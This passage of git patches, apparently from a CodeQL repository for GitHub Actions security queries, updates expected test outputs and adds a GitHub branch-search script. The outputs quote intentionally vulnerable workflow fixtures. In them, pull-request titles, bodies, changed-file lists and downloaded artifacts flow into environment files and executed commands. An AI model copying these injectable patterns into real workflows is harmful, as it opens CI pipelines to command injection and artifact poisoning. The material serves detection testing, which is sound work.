"$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:10:9:13:6 | Run Step: title [title] | provenance | | +| .github/workflows/test15.yml:17:9:21:6 | Run Step: title [title] | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | provenance | | +| .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:17:9:21:6 | Run Step: title [title] | provenance | | +| .github/workflows/test15.yml:23:5:29:2 | Job: test3 [TITLE] | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | provenance | | +| .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:23:5:29:2 | Job: test3 [TITLE] | provenance | | +| .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | provenance | | +| .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | provenance | | +| .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | +| .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | +| .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | +| .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | provenance | | +| .github/workflows/test.yml:23:9:27:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:29:19:29:46 | steps.step1.outputs.MSG | provenance | | +| .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | .github/workflows/test.yml:23:9:27:6 | Run Step: step1 [MSG] | provenance | | +| .github/workflows/test.yml:27:9:31:6 | Run Step: step2 [MSG2] | .github/workflows/test.yml:33:20:33:48 | steps.step2.outputs.MSG2 | provenance | | +| .github/workflows/test.yml:29:19:29:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:27:9:31:6 | Run Step: step2 [MSG2] | provenance | | +| .github/workflows/test.yml:31:9:35:6 | Run Step: step3 [MSG3] | .github/workflows/test.yml:37:20:37:48 | steps.step3.outputs.MSG3 | provenance | | +| .github/workflows/test.yml:33:20:33:48 | steps.step2.outputs.MSG2 | .github/workflows/test.yml:31:9:35:6 | Run Step: step3 [MSG3] | provenance | | +| .github/workflows/test.yml:35:9:39:6 | Run Step: step4 [MSG4] | .github/workflows/test.yml:41:20:41:48 | steps.step4.outputs.MSG4 | provenance | | +| .github/workflows/test.yml:37:20:37:48 | steps.step3.outputs.MSG3 | .github/workflows/test.yml:35:9:39:6 | Run Step: step4 [MSG4] | provenance | | +| .github/workflows/test.yml:39:9:44:2 | Run Step: step5 [MSG5] | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | provenance | | +| .github/workflows/test.yml:41:20:41:48 | steps.step4.outputs.MSG4 | .github/workflows/test.yml:39:9:44:2 | Run Step: step5 [MSG5] | provenance | | +| .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:12:14:13:63 | echo "::set-output name=pr_number::$(> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | semmle.label | needs.get-artifacts.outputs.pr_num | -| .github/workflows/test11.yml:55:20:55:57 | needs.get-artifacts.outputs.ref | semmle.label | needs.get-artifacts.outputs.ref | | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | semmle.label | github.event.pull_request.title \|\| "foo" | | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | semmle.label | github.event.changes.body.from | | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | semmle.label | github.event.changes.head.ref.from | | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | semmle.label | toJson(github.event.changes) | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | -| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | -| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | -| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | -| .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | -| .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | semmle.label | Run Step: step2 [MSG2] | -| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | -| .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | semmle.label | Run Step: step3 [MSG3] | -| .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | semmle.label | steps.step2.outputs.MSG2 | -| .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | semmle.label | Run Step: step4 [MSG4] | -| .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | semmle.label | steps.step3.outputs.MSG3 | -| .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | semmle.label | Run Step: step5 [MSG5] | -| .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | semmle.label | steps.step4.outputs.MSG4 | -| .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | +| .github/workflows/test14.yml:13:9:16:6 | Run Step: changed-files [files] | semmle.label | Run Step: changed-files [files] | +| .github/workflows/test14.yml:14:14:15:117 | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | semmle.label | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | semmle.label | steps.changed-files.outputs.files | +| .github/workflows/test14.yml:23:9:27:6 | Run Step: changed-files [files] | semmle.label | Run Step: changed-files [files] | +| .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | semmle.label | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | semmle.label | steps.changed-files.outputs.files | +| .github/workflows/test14.yml:29:5:38:2 | Job: test3 [CHANGED-FILES] | semmle.label | Job: test3 [CHANGED-FILES] | +| .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | semmle.label | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | +| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | semmle.label | env.CHANGED-FILES | +| .github/workflows/test14.yml:39:5:48:45 | Job: test4 [CHANGED-FILES] | semmle.label | Job: test4 [CHANGED-FILES] | +| .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | semmle.label | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | +| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | semmle.label | env.CHANGED-FILES | +| .github/workflows/test15.yml:10:9:13:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | semmle.label | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test15.yml:17:9:21:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test15.yml:23:5:29:2 | Job: test3 [TITLE] | semmle.label | Job: test3 [TITLE] | +| .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | semmle.label | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | semmle.label | env.TITLE | +| .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | semmle.label | Job: test4 [TITLE] | +| .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | semmle.label | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | semmle.label | env.TITLE | +| .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | +| .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | +| .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | semmle.label | github.event['pull_request']['body'] | +| .github/workflows/test.yml:23:9:27:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | +| .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | +| .github/workflows/test.yml:27:9:31:6 | Run Step: step2 [MSG2] | semmle.label | Run Step: step2 [MSG2] | +| .github/workflows/test.yml:29:19:29:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | +| .github/workflows/test.yml:31:9:35:6 | Run Step: step3 [MSG3] | semmle.label | Run Step: step3 [MSG3] | +| .github/workflows/test.yml:33:20:33:48 | steps.step2.outputs.MSG2 | semmle.label | steps.step2.outputs.MSG2 | +| .github/workflows/test.yml:35:9:39:6 | Run Step: step4 [MSG4] | semmle.label | Run Step: step4 [MSG4] | +| .github/workflows/test.yml:37:20:37:48 | steps.step3.outputs.MSG3 | semmle.label | steps.step3.outputs.MSG3 | +| .github/workflows/test.yml:39:9:44:2 | Run Step: step5 [MSG5] | semmle.label | Run Step: step5 [MSG5] | +| .github/workflows/test.yml:41:20:41:48 | steps.step4.outputs.MSG4 | semmle.label | steps.step4.outputs.MSG4 | +| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/untrusted_checkout1.yml:11:9:14:6 | Run Step: artifact [pr_number] | semmle.label | Run Step: artifact [pr_number] | | .github/workflows/untrusted_checkout1.yml:12:14:13:63 | echo "::set-output name=pr_number::$(> $GITHUB_ENV\n | provenance | | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | -| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | | -| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | | -| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | Config | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | Config | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | Config | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | provenance | Config | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | Config | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | provenance | Config | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | provenance | Config | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | provenance | Config | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | provenance | Config | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | provenance | Config | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | Config | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | Config | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | Config | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | Config | nodes | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | @@ -51,7 +48,6 @@ nodes | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | semmle.label | python test.py | -| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | semmle.label | make snapshot | subpaths diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index e1532c06cdc..8d946507799 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected @@ -1,24 +1,21 @@ edges -| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | provenance | | -| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | | -| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | | -| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | -| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | provenance | | -| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | provenance | | -| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | provenance | | -| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | provenance | | -| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | provenance | | -| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | provenance | | -| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | | -| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | | -| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | -| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | | -| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | | -| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | Config | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | Config | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | Config | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | provenance | Config | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | Config | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | provenance | Config | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | provenance | Config | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | provenance | Config | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | provenance | Config | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | provenance | Config | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | Config | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | Config | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | Config | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | Config | nodes | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | @@ -51,7 +48,6 @@ nodes | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | semmle.label | python test.py | -| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | semmle.label | make snapshot | subpaths From 48fa2967eda4212a5082b9a460351375152b2754 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 11 Oct 2024 12:22:40 +0200 Subject: [PATCH 0579/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- search_branches.py | 88 ++++++++++++++++++++++++++++++++++++++++++++++ 3 files changed, 90 insertions(+), 2 deletions(-) create mode 100644 search_branches.py diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 91329e4f347..229b1f81c7b 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.65 +version: 0.1.66 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 1689480b56b..e03e2a45cb7 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.65 +version: 0.1.66 groups: [actions, queries] suites: codeql-suites extractor: javascript diff --git a/search_branches.py b/search_branches.py new file mode 100644 index 00000000000..d0036169fea --- /dev/null +++ b/search_branches.py @@ -0,0 +1,88 @@ +import base64 +import os +import re +import sys +import time + +import requests + + +def handle_rate_limit(response, wait_time=60): + return False + + +def search_branches(repo_nwo, file_path, regex_pattern): + # GitHub API base URL + base_url = "https://api.github.com" + + # Get GitHub token from environment variable + github_token = os.environ.get("GITHUB_TOKEN") + if not github_token: + print("Error: GITHUB_TOKEN environment variable not set") + sys.exit(1) + + # Set up headers for authenticated requests + headers = { + "Authorization": f"token {github_token}", + "Accept": "application/vnd.github.v3+json", + } + + # Get all branches (with pagination) + branches_url = f"{base_url}/repos/{repo_nwo}/branches" + branches = [] + while branches_url: + branches_response = requests.get(branches_url, headers=headers) + if handle_rate_limit(branches_response): + continue + branches_response.raise_for_status() + branches.extend(branches_response.json()) + branches_url = branches_response.links.get("next", {}).get("url") + + # Compile the regex pattern + pattern = re.compile(regex_pattern) + + # Search file contents in each branch + for branch in branches: + branch_name = branch["name"] + file_url = f"{base_url}/repos/{repo_nwo}/contents/{file_path}?ref={branch_name}" + + while True: + file_response = requests.get(file_url, headers=headers) + + if file_response.status_code == 200: + file_content = file_response.json()["content"] + + decoded_content = base64.b64decode(file_content).decode("utf-8") + + if pattern.search(decoded_content): + print(f"Match found in branch: {branch_name}!!!!!") + else: + print(f"No match found in branch: {branch_name}") + break + elif file_response.status_code == 404: + print(f"File not found in branch: {branch_name}") + break + elif ( + file_response.status_code == 403 + and "X-RateLimit-Remaining" in file_response.headers + ): + if int(file_response.headers["X-RateLimit-Remaining"]) == 0: + reset_time = int(file_response.headers["X-RateLimit-Reset"]) + sleep_time = reset_time - int(time.time()) + 1 + print(f"Rate limit exceeded. Waiting for {sleep_time} seconds.") + time.sleep(sleep_time) + + +if __name__ == "__main__": + if len(sys.argv) != 4: + print("Usage: python search_branches.py ") + sys.exit(1) + + repo_nwo = sys.argv[1] + file_path = sys.argv[2] + regex_pattern = sys.argv[3] + + print( + f"Searching branches in {repo_nwo} for {file_path} with pattern {regex_pattern}" + ) + search_branches(repo_nwo, file_path, regex_pattern) From c7b57b5b771b5cbda25e252bffdcfc1900f18498 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sun, 13 Oct 2024 11:55:41 +0200 Subject: [PATCH 0580/1267] Merge command and file store steps --- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 60 ++++++------------- .../dataflow/internal/DataFlowPrivate.qll | 2 - 2 files changed, 18 insertions(+), 44 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll 